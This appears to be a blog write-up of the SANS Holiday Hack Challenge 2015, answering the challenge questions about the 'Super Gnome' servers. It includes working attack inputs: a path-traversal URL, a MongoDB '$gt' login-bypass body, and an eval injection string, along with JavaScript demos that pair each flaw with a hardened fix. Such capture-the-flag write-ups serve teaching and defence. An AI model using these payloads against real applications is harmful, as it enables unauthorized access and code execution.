Tuesday, January 5, 2016

SANS Holiday Hack Challenge 2015: Answers Attempt

1. What commands were sent over the gnome's command and control center?
(I'm not certain whether this answer is correct. I was looking at the DNS responses in the case. I may have needed the DNS requests.)

EXEC:iwconfig
EXEC:START_STATEEXEC:wlan0
EXEC:lo
EXEC:eth0
EXEC:cat /tmp/iwlistscan.txt EXEC:STOP_STATENONE:NONE:NONE:NONE:FILE:/root/Pictures/snapshot_CURRENT.jpg FILE:START_STATE,NAME=/root/Pictures/snapshot_CURRENT.jpg


(I wasn't sure if the whole C&C transaction was required. I listed it later in this write-up.)

2. What image appears in the photo the Gnome sent across the channel from the Dosis' home?



3. What operating system and CPU type are being used in the Gnome? 

The operating system is OpenWrt. The CPU type is ARMx64.

3. What type of web framework is the Gnome web interface built in?

The Gnome web interface is built in Express, a web framework for Node.js.


4. What kind of a database engine is used to support the Gnome web interface?

The database engine used to support the Gnome web interface is MongoDB.


4. What is the password stored in the Gnome database?

The password stored in the Gnome database is SittingOnAShelf.


5. What are the IP Addresses of the five Super Gnomes scattered around the world, as verified by Tom Hessman in the Dosis neighborhood?

The IP addresses of the five Super Gnomes scattered around the world, as verified by Tom Hessman, are:
Super Gnome 1: 52.2.229.189
Super Gnome 2: 52.34.3.80
Super Gnome 3: 52.64.191.71
Super Gnome 4: 52.192.152.132
Super Gnome 5: 54.233.105.81

6. Where is each gnome located geographically? 

One gnome is located in Japan.
One gnome is located in Australia.
One gnome is located in Brazil.
Two gnomes are located in the United States.

7. Please describe the vulnerabilities that you discovered in the Gnome firmware.

Every gnome except Gnome 3 has the password reuse vulnerability.
The first gnome had a plaintext password stored in the Gnome.0 Mongo database.
The second gnome's vulnerabilities were in the settings file upload feature and the cam viewer feature. The cam viewer introduces a local file inclusion vulnerability through the “camera” variable.
The third gnome has a flaw that allows one to bypass the login page.
The fourth gnome has image processing capability added to it. Unfortunately, in the file upload section, the image processing option is passed to an “eval” statement without the user input being sanitized. The only protection is a MIME-type check, which can be bypassed.
The fifth gnome is vulnerable to attack via port 4242, where a Super Gnome Status Server listens. The first gnome had the source code for the service running on that port. I suspect that sgstatd.c is vulnerable to a buffer overflow or a frame pointer overwrite.

8.  Please describe how you exploited each vulnerability.

Super Gnome 1: One could simply log on to 52.2.229.189 with the username “admin” and the password “SittingOnAShelf”. The IP address is listed in the /etc/hosts file in the firmware.


Super Gnome 2: One could use the upload “filen” variable to create a directory to which one had access. Giving that directory a name containing .png satisfies the cam viewer's .png check, which only looks for the substring; once the check passed, whatever the cam viewer's “camera” variable was set to was displayed on the screen. After creating such a directory, one could craft a URL like the one below to reach any directory and file one wished to.

http://52.34.3.80/cam?camera=../../../../../../../gnome/www/public/upload/LUbQRcPB/abcde/bob.png/../../../../../../../gnome/www/files/gnome.conf

Super Gnome 3: One could use the username “admin” and make the password check evaluate to true by sending the login POST with Content-Type: application/json and the body {"username": "admin", "password": {"$gt": ""}}. The JSON body parser hands the nested object straight to the MongoDB query, so the password condition becomes “greater than the empty string”, which any stored password satisfies.
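An added example of the login bypass, written by me rather than taken from the Gnome's code: the matcher is a small stand-in for MongoDB's comparison rules (equality, plus `$gt` on strings), the user record is constructed, and the function names are assumptions. It shows the same request body passing the vulnerable check and being refused by a type check.

```javascript
// Added example, not the Gnome's own code. The user record is constructed
// and fieldMatches() is a stand-in for MongoDB's comparison rules.
const users = [{ username: 'admin', password: 'SittingOnAShelf' }];  // constructed record

// Stand-in for how MongoDB evaluates one field condition: a plain value means
// equality, an object carrying $gt means "greater than".
function fieldMatches(stored, cond) {
  if (cond !== null && typeof cond === 'object' && '$gt' in cond) {
    return typeof stored === 'string' && stored > cond.$gt;
  }
  return stored === cond;
}

function findUser(query) {
  return users.find(u => fieldMatches(u.username, query.username) &&
                         fieldMatches(u.password, query.password)) || null;
}

// Vulnerable: request fields go straight into the query. With
// Content-Type: application/json the body parser delivers nested objects
// intact, so {"$gt": ""} is treated as an operator, not as a password.
function vulnerableLogin(body) {
  return findUser({ username: body.username, password: body.password });
}

// Hardened: anything that is not a string is refused before it can become a
// query operator. (Casting with String() would also work; refusing is stricter.)
function hardenedLogin(body) {
  if (typeof body.username !== 'string' || typeof body.password !== 'string') {
    return null;
  }
  return findUser({ username: body.username, password: body.password });
}

// The POST body from the write-up, exactly as the JSON parser would deliver it.
const BYPASS_BODY = JSON.parse('{"username": "admin", "password": {"$gt": ""}}');
```

`vulnerableLogin(BYPASS_BODY)` returns the admin record without the password ever being supplied; `hardenedLogin(BYPASS_BODY)` returns `null`, and only a real string password gets through it.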

Super Gnome 4: One could place a server-side JavaScript (SSJS) injection in the postproc field of the upload POST request, which reaches the “eval” function. eval takes a string and executes it as code, so the injected string runs with the privileges of the web server.
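An added example of the eval injection, my own code rather than the Gnome's: the dispatch-by-eval pattern and the operation names model the behaviour described above and are assumptions. The injected string closes the intended call, runs attacker code, and comments out the rest; the hardened version looks the operation up in an allowlist so nothing from the request is interpreted as code.

```javascript
// Added example, not the Gnome's own code. The eval dispatch and the
// operation names are assumptions modelling the behaviour described above.
const postproc = {
  rotate: img => `${img}:rotated`,
  scale:  img => `${img}:scaled`,
};

// Vulnerable: the attacker-controlled "postproc" field is spliced into a
// string that eval() then executes with the server's privileges. A MIME-type
// check on the uploaded file does nothing to constrain this string.
function vulnerableRunPostproc(op, img) {
  return eval(`postproc.${op}(img)`);
}

// Hardened: look the operation up in an allowlist (own properties only, so
// "__proto__" and friends are refused too); no request data becomes code.
function hardenedRunPostproc(op, img) {
  if (!Object.prototype.hasOwnProperty.call(postproc, op)) {
    throw new Error(`unknown postproc operation: ${op}`);
  }
  return postproc[op](img);
}

// Injected value for the postproc field: finishes the intended call, runs
// attacker-chosen code (harmless here: read the server's working directory),
// and comments out the "(img)" the server appends. eval() returns the value
// of the last statement, so the attacker's result comes back in the response.
const INJECTED = 'rotate(img); process.cwd(); //';
```

`vulnerableRunPostproc(INJECTED, 'cam.png')` returns the server's working directory instead of a processed image name, which is all the proof needed that arbitrary code ran; `hardenedRunPostproc` throws on the same input.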

Super Gnome 5: I'm not certain how one would exploit this Super Gnome. I do notice that it handles buffers and pointers to memory locations, though, and usually such pointers can be overwritten via the buffer to point to whatever position in memory the attacker wants to target, hence the term “buffer overflow vulnerability”. Canaries are used to help mitigate this problem, although they aren't always successful; there are ways to bypass them. This may actually require a frame pointer overwrite, which is different from a buffer overflow.

9.  What is the nefarious plot of the ATNAS corporation?

The nefarious plot of the ATNAS Corporation is outlined in the e-mail contained in Super Gnome 3. The nefarious plot is to rob everyone who owns a Gnome In Your Home on Christmas Eve.

10.  Who is the villain behind this plot?

It's Cindy Lou Who. In the e-mail contained in Super Gnome 3, the boss spells out the plan, and the manner of speech is that of the Grinch. In the e-mail contained in Super Gnome 4, Cindy Lou Who explains that seeing the Grinch rob her home when she was about two traumatized her and caused her to hate the Christmas season. When one XORs the camera images factory_cam_1.png, factory_cam_2.png, factory_cam_3.png, factory_cam_4.png and camera_feed_overlap_error.png together, a picture starts to emerge. It appears to be Cindy Lou Who.
